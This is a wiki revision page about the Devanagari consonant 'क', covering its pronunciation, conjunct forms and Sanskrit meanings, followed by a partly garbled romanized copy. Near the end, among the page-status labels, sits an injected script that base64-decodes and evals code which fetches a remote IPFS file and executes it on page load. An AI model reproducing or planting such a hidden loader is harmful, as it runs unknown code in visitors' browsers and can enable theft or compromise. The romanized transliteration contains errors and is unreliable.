Difference between revisions of "क"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:क.jpg|right|150px]]
 
[[चित्र:क.jpg|right|150px]]
 +
'''क''' [[देवनागरी वर्णमाला|हिन्दी वर्णमाला]] का पहला [[व्यंजन (व्याकरण)|व्यंजन]] तथा क वर्ग का पहला वर्ण है। भाषाविज्ञान की दृष्टि से यह कंठ्य (कोमल तालव्य), स्पर्श, अल्पप्राण और अघोष है। ‘क’ का महाप्राण रूप ‘ख’ है। [[अरबी भाषा|अरबी]] से आया ‘क़’, जो हिंदी में प्राय: ‘क’ भी बोला और लिखा जाता है (जैसे—क़लम/कलम), जिह्वमूलीय, स्पर्श, अल्पप्राण और अघोष है।
 +
;विशेष-
 +
# ‘क’ का प्रयोग शब्द के आरम्भ, मध्य और अंत (तीनों में) होता है (क्या, वाक्य, वाक्)।
 +
# ‘क्’ के अनेक सन्युक्त रूप (अर्थात् व्यंजन् – गुच्छ) सम्भव हैं।
 +
# ‘क’ का द्वित्व भी होता है और उसे ‘क्क’ लिखा जाता है (पक्का, शक्की)
 +
# ‘क्’ अपने बाद के व्यंजन से प्राय: ‘क्’ रूप में मिलता है (युक्त, वाक्य, हुक्म) परंतु ‘र’ से मिलने पर सन्युक्त रूप ‘क्र’ प्रयुक्त होता है (चक्र, क्रम, विक्रेता); ‘ष’ से मिलने पर सन्युक्त रूप ‘क्ष’प्रयुक्त होता है (यक्ष, कक्षा, पक्षी, क्षेम, लक्ष्य)।
 +
# ‘क’ से पहले आकर मिलने वाले व्यंजन प्राय: अपनी खड़ी रेखा छोड़कर मिलते हैं (कल्क, खुश्क, शुष्क, वयस्क); परंतु पहले आकर मिलने वाला ‘र्’ शिरोरेखा के ऊपर जाकर सन्युक्त रूप ‘र्क’ बनाता है (जैसे- कर्क, तर्क)।
 +
# [ [[संस्कृत]] (धातु) कच् + ड ] [[पुल्लिंग]]- 1. ब्रह्म। 2. आत्मा। 3. विष्णु। 4. अग्नि। 5. वायु। 6. शब्द। 7. पुष्प। फूल। 8. कामदेव। 9. सूर्य। 10. यमराज। 11. प्रजापति। 12. राजा। 13. काल। समय। 14. मेघ। बादल। 15. पक्षी। 16. मयूर। मोर। 17. गरुड़। 18. मन। 19. शरीर। 20. स्वर्ण। सोना।
 +
# [ संस्कृत (धातु) कै + ड ] पुल्लिंग-  1. प्रसन्नता। हर्ष। 2. केश। बाल। 3. जल। पानी।
  
'''''' [[देवनागरी लिपि]] का तेरवा [[अक्षर]] है। यह एक [[व्यंजन (व्याकरण)|व्यंजन]] है।
+
{| class="bharattable-green"
 +
|-
 +
| क  
 +
| का
 +
| कि
 +
| की
 +
| कु
 +
| कू
 +
| कृ
 +
| के
 +
| कै
 +
| को
 +
| कौ
 +
| कं
 +
| कः
 +
|}
 
==क अक्षर वाले शब्द==
 
==क अक्षर वाले शब्द==
 
* [[कबूतर]]
 
* [[कबूतर]]

Revision as of 13:45, 29 November 2016

right|150px k hindi varnamala ka pahala vyanjan tatha k varg ka pahala varn hai. bhashavijnan ki drishti se yah kanthy (komal talavy), sparsh, alpapran aur aghosh hai. ‘k’ ka mahapran roop ‘kh’ hai. arabi se aya ‘q’, jo hiandi mean pray: ‘k’ bhi bola aur likha jata hai (jaise—qalam/kalam), jihvamooliy, sparsh, alpapran aur aghosh hai.

vishesh-
  1. ‘k’ ka prayog shabd ke arambh, madhy aur aant (tinoan mean) hota hai (kya, vaky, vakh).
  2. ‘kh’ ke anek sanyukt roop (arthath vyanjanh – guchchh) sambhav haian.
  3. ‘k’ ka dvitv bhi hota hai aur use ‘kk’ likha jata hai (pakka, shakki)
  4. ‘kh’ apane bad ke vyanjan se pray: ‘kh’ roop mean milata hai (yukt, vaky, hukm) parantu ‘r’ se milane par sanyukt roop ‘kr’ prayukt hota hai (chakr, kram, vikreta); ‘sh’ se milane par sanyukt roop ‘ksh’prayukt hota hai (yaksh, kaksha, pakshi, kshem, lakshy).
  5. ‘k’ se pahale akar milane vale vyanjan pray: apani kh di rekha chho dakar milate haian (kalk, khushk, shushk, vayask); parantu pahale akar milane vala ‘rh’ shirorekha ke oopar jakar sanyukt roop ‘rk’ banata hai (jaise- kark, tark).
  6. [ sanskrit (dhatu) kachh + d ] pulliang- 1. brahm. 2. atma. 3. vishnu. 4. agni. 5. vayu. 6. shabd. 7. pushp. phool. 8. kamadev. 9. soory. 10. yamaraj. 11. prajapati. 12. raja. 13. kal. samay. 14. megh. badal. 15. pakshi. 16. mayoor. mor. 17. garu d. 18. man. 19. sharir. 20. svarn. sona.
  7. [ sanskrit (dhatu) kai + d ] pulliang- 1. prasannata. harsh. 2. kesh. bal. 3. jal. pani.
k ka ki ki ku koo kri ke kai ko kau kan kah

k akshar vale shabd



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh